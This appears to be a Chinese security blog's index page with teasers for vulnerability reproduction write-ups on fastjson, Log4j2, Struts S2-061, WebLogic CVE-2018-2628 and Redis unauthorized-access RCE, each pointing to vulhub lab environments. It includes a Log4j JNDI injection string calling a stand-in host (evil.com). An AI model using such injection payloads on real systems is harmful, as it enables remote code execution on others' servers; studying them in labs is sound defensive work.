0%

漏洞概述

CVE-2017-18349
fastjson 在解析 json 的过程中,支持使用 autoType 来实例化某一个具体的类,并调用该类的 set/get 方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链。
根据官方给出的补丁文件,主要的更新在这个 checkAutoType 函数上,而这个函数的主要功能就是添加了黑名单,将一些常用的反序列化利用库都添加到黑名单中。

复现环境

vulhub项目 https://vulhub.org/#/environments/fastjson/1.2.24-rce/

Exploit

阅读全文 »

概述

CVE-2021-44228
Apache Log4j2 是一款开源的 Java 日志记录工具,大量的业务框架都使用了该组件。如:Apache Struts2、Apache Solr、Apache Druid、Apache Flink等。此次漏洞是用于 Log4j2 提供的 lookup 功能造成的,该功能允许开发者通过一些协议去读取相应环境中的配置。但在实现的过程中,并未对输入进行严格的判断,从而造成漏洞的发生。
在其2.0到2.14.1版本中存在一处JNDI注入漏洞,攻击者在可以控制日志内容的情况下,通过传入类似于${jndi:ldap://evil.com/example}的lookup用于进行JNDI注入,执行任意代码。

影响范围

Apache Log4j 2.x < 2.15.0-rc2

环境

阅读全文 »

概述

Apache Struts于2020年12月08日披露 S2-061 Struts 远程代码执行漏洞(CVE-2020-17530)
Struts2 会对某些标签属性(比如 id,其他属性有待寻找) 的属性值进行二次表达式解析,因此当这些标签属性中使用了 %{x}x 的值用户可控时,用户再传入一个 %{payload} 即可造成OGNL表达式执行。S2-061是对S2-059沙盒进行的绕过。

影响范围:Apache Struts 2.0.0-2.5.25

环境

vulhub项目地址 https://vulhub.org/#/environments/struts2/s2-061/

阅读全文 »

漏洞解析

Weblogic WLS Core Components 反序列化命令执行漏洞(CVE-2018-2628)
Oracle 2018年4月补丁中,修复了Weblogic Server WLS Core Components中出现的一个反序列化漏洞(CVE-2018-2628),该漏洞通过t3协议触发,可导致未授权的用户在远程服务器执行任意命令。

环境

vulhub环境

1
2
cd CVE-2018-2628  
docker-compose up -d
阅读全文 »

漏洞解析

Redis未授权访问在4.x/5.0.5以前版本下,我们可以使用master/slave模式加载远程模块,通过动态链接库的方式执行任意命令。

利用前提

redis直接暴露在外网,无访问限制
没有设置密码认证(一般为空),可以免密码远程登录redis服务。

靶场环境

阅读全文 »